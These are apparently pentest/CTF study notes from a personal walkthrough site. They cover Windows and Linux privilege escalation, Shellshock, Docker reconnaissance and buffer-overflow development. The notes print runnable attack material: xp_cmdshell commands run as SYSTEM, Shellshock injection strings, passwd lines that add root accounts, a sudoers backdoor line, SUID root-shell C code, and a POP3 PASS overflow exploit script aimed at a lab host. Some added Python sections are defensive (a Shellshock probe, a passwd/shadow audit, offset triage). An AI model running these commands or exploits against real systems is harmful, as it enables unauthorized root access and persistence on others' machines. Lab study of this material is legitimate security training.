\set password=password
\set style=vert

root@kali:~/# sqsh -S s128
sqsh-2.1.7 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2010 Michael Peppler
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> xp_cmdshell 'whoami'
2> go
output: NT AUTHORITY\SYSTEM
output: NULL
(return status = 0)
1> xp_cmdshell 'type "C:\Documents and Settings\Administrator\Desktop\proof.txt"'
2> go
output: contents of proof.txt
output: NULL
(return status = 0)

xp_cmdshell is off by default; with a sysadmin login enable it first:
1> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
2> go
PE

Sequence:

1. Easy fail - /etc/passwd (and shadow) permissions, SAM file in Repair, check how patched the system is to get an idea of next steps
2. Kernel exploit
3. Info disclosure in the compromised service/user - also check logs and home folders
4. files/folders/service (permission) misconfiguration
5. Run LPC/WPC
6. Follow the PE guide

Once in, look for clues in the current dir and the user's home dir.

If you find both passwd and shadow you can use unshadow to combine them and then run john: unshadow passwd shadow > combined

Always run ps aux: ps -f ax for the parent id, ps afx for a graphical parent tree

Shell shock

env x='() { :;}; echo vulnerable' bash -c "ps aux"
env x='() { :;}; /usr/bin/id' /bin/bash -c "/usr/bin/id"
/usr/bin/env x='() { :;}; /usr/bin/id' /bin/bash -c "ps aux"

(A vulnerable bash runs the trailing command when it imports the function from the environment, so the injected command's output appears before the output of the -c command; a patched bash prints only the latter.)
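The Shell shock test above (and the User-Agent form of it in the ShellShock over HTTP note) as an added Python probe that is not code from the original notes: it runs the notes' `env x='() { :;}; echo ...' bash -c ...` check against the local bash and decides vulnerability from where the marker appears, so it returns False on a patched bash rather than guessing from a warning on stderr. The output parser is separated from the process call so it can be checked against constructed output; shutil.which() is used to find bash, and the function returns None when there is no bash to test.

```python
import shutil
import subprocess

MARKER = "SHELLSHOCK-MARKER"


def parse_probe_output(stdout):
    """A vulnerable bash executes the command trailing the function definition
    while importing the environment, i.e. *before* the -c command runs, so the
    marker shows up as the first line of stdout.  A patched bash never prints it."""
    lines = stdout.splitlines()
    return bool(lines) and lines[0].strip() == MARKER


def probe_bash(bash=None):
    """Run the notes' test locally.  Returns True (vulnerable), False (patched)
    or None (no bash found to test).  Only PATH and the probe variable are passed,
    so nothing else in the environment can interfere with the result."""
    bash = bash or shutil.which("bash")
    if not bash:
        return None
    env = {"x": "() { :;}; echo " + MARKER, "PATH": "/usr/bin:/bin"}
    proc = subprocess.run([bash, "-c", "echo done"], env=env,
                          capture_output=True, text=True)
    return parse_probe_output(proc.stdout)


# Constructed outputs of what the two outcomes look like (not captured from a real host).
VULNERABLE_OUTPUT = MARKER + "\ndone\n"
PATCHED_OUTPUT = "done\n"


if __name__ == "__main__":
    print("local bash vulnerable:", probe_bash())
```

Against a CGI endpoint the same marker trick works with the wget -U header from the HTTP note: put `echo; echo; echo SHELLSHOCK-MARKER` after the function body and look for the marker at the top of the response body instead of launching a reverse shell straight away.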
check sudo -l for a list of commands that the current user can run as other users without entering any password.
PE
BO if python is found find / -name "python*" 2>/dev/null it can be used to get TTY with: python -c 'import pty; pty.spawn("/bin/bash")'
Python script
Docker Find writable files for user: find / -writable -type f 2>/dev/null | grep -v ^/proc

Any suspected file run periodically (via crontab) which can be edited might allow PE.

look through logs to find interesting processes/configurations

Find files which have sticky bit on: /bin/find / -perm -4001 -type f 2>/dev/null

uid and gid with root (newer GNU find rejects the +mode form and uses -perm /2000 instead):
find / -perm +2000 -user root -type f 2>/dev/null
find / -perm +4000 -user root -type f 2>/dev/null

Run command using stickybit in executable to get shell

write c executable that sets setuid(0) setgid(0) then system(/bin/bash).
As root, change owner to root:root and permission to 4755.
Run it as your user and you have root shell. check for files which have sticky bits
/etc/passwd is writable:

echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy

add user in both passwd and shadow toor:toor:

echo 'toor:x:0:0:root:/root:/bin/bash' >>/etc/passwd
echo 'toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:
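The two appends above are exactly what a passwd/shadow integrity check should catch. As an added defensive example (not part of the original notes), this audit parses passwd- and shadow-format text and flags a UID 0 account other than root, an entry with an empty password field, and a shadow line with an empty hash; the sample records are constructed and the hash values in them are placeholders.

```python
# Constructed sample records (not from a real host). The last two passwd
# lines are the appended entries described in the notes; hashes are placeholders.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bob:x:1000:1000:bob:/home/bob:/bin/bash
dummy::0:0::/root:/bin/bash
toor:x:0:0:root:/root:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$6$PLACEHOLDER$HASH:14798:0:99999:7:::
bob:$6$PLACEHOLDER$HASH:14798:0:99999:7:::
toor::14798:0:99999:7:::
"""


def audit_passwd(text):
    """Return (user, finding) pairs for passwd-format text.

    empty-password: second field blank, so login needs no password and
                    shadow is never consulted (the dummy::0:0 trick).
    uid0-alias:     a UID 0 account that is not root (the appended toor).
    """
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:  # passwd has exactly seven colon-separated fields
            findings.append((fields[0], "malformed"))
            continue
        user, passwd, uid = fields[0], fields[1], fields[2]
        if passwd == "":
            findings.append((user, "empty-password"))
        if uid == "0" and user != "root":
            findings.append((user, "uid0-alias"))
    return findings


def audit_shadow(text):
    """Flag shadow entries whose hash field is empty (login without a password).
    Locked entries ('!' or '*') are not flagged."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) > 1 and fields[1] == "":
            findings.append((fields[0], "empty-hash"))
    return findings


if __name__ == "__main__":
    for user, why in audit_passwd(SAMPLE_PASSWD) + audit_shadow(SAMPLE_SHADOW):
        print(f"{user}: {why}")
```

On a live host the same functions can be fed the contents of /etc/passwd and /etc/shadow (the latter needs root to read) as part of a periodic baseline check.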

msf exploit(handler) > run post/multi/recon/local_exploit_suggester

if we have euid set to 1001: python -c 'import os,pty; os.setresuid(1001,1001,1001); pty.spawn("/bin/bash")'
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    /* setregid(0,0); setegid(0); in case we have only euid set to 0. To check r */
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}

Maintaining PE: echo "userName ALL=(ALL:ALL) ALL" >>/etc/sudoers then use sudo su from user userName
BO

Windows:

Immunity debugger

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438

root@kali:~/labs/614# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000 FFE4 jmp esp
nasm > add eax,12
00000000 83C00C add eax,byte +0xc

!mona modules
!mona find -s "\xff\xe4" -m SLMFC.DLL

write the return address into the script in little-endian byte order (x86)
Python script

#!/usr/bin/python
# Python 2: str is a byte string, so the escaped bytes go on the wire as written
import socket
#string = "A"*2700              # pattern length used with pattern_create
string = "A"*2606               # offset reported by pattern_offset -q 39694438
string += "\xE3\x41\x4B\x5F"    # return address (JMP ESP) in little-endian order
buf = "\x90"*20 # NOPs to allow decoding
string += buf
try:
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect(('10.11.17.98',110))
    s.recv(1024)
    s.send('USER test\r\n')
    s.recv(1024)
    s.send('PASS ' + string + '\r\n')
    s.send('QUIT\r\n')
    s.close()
except:
    print('Unable to connect')
    exit(0)
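Added example (not from the original notes): a reimplementation of the cyclic pattern that pattern_create.rb produces and the lookup that pattern_offset.rb performs, used as crash triage to show where the 2606 in the script above comes from. The EIP value 39694438 quoted earlier is the bytes "8Di9" in memory order, and they sit 2606 bytes into a 2700-byte pattern; pack_address is an added helper that shows the little-endian packing the note about the return address refers to.

```python
import string
import struct


def pattern_create(length):
    """Non-repeating pattern of upper/lower/digit triplets (Aa0Aa1Aa2...),
    the same scheme Metasploit's pattern_create.rb uses."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]  # only reached for length > 20280


def pattern_offset(eip, length=2700):
    """Offset in the pattern of the 4 bytes that landed in EIP at the crash.

    eip is the register value as the debugger shows it, as an int or as the
    hex string given to pattern_offset.rb -q. x86 is little-endian, so the
    value 0x39694438 was the bytes 38 44 69 39 ("8Di9") in the input.
    Returns -1 when the value did not come from the pattern at all.
    """
    if isinstance(eip, str):
        eip = int(eip, 16)
    needle = struct.pack("<I", eip).decode("ascii", errors="replace")
    return pattern_create(length).find(needle)


def pack_address(addr):
    """Little-endian bytes of a 32-bit address as they must appear in the
    payload (0x5F4B41E3 -> b"\\xe3\\x41\\x4b\\x5f")."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    print(pattern_offset("39694438"))   # 2606, the length of the "A" padding
    print(pack_address(0x5F4B41E3))     # b'\xe3AK_'
```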
Linux:

edb --run /usr/games/crossfire/bin/crossfire

strings <filename>

Ollydbg for windows
F2 - place breakpoint
F7 - step into
F8 - step over (let the call complete)

objdump -d file will dump assembly
Docker

Get path of container in host file structure:

docker_path=/proc/$(docker inspect --format '{{.State.Pid}}' <ContainerID>)/root

transfer docker image to host by using root@kali:~/# docker save uzyexe/nmap -o nmap.tar and after copying on target:

docker load --input nmap.tar
docker run --network=br0 -it --rm uzyexe/nmap -sn -T4 -v 10.10.10.0/24 >scan.out &

Identify if you are inside a container - cat /proc/self/cgroup | grep docker
Walkthrough

malikashish8

This is a GitHub Pages project which holds Walkthroughs/Write-ups of CTF, Vulnerable Machines and exploits that I come across.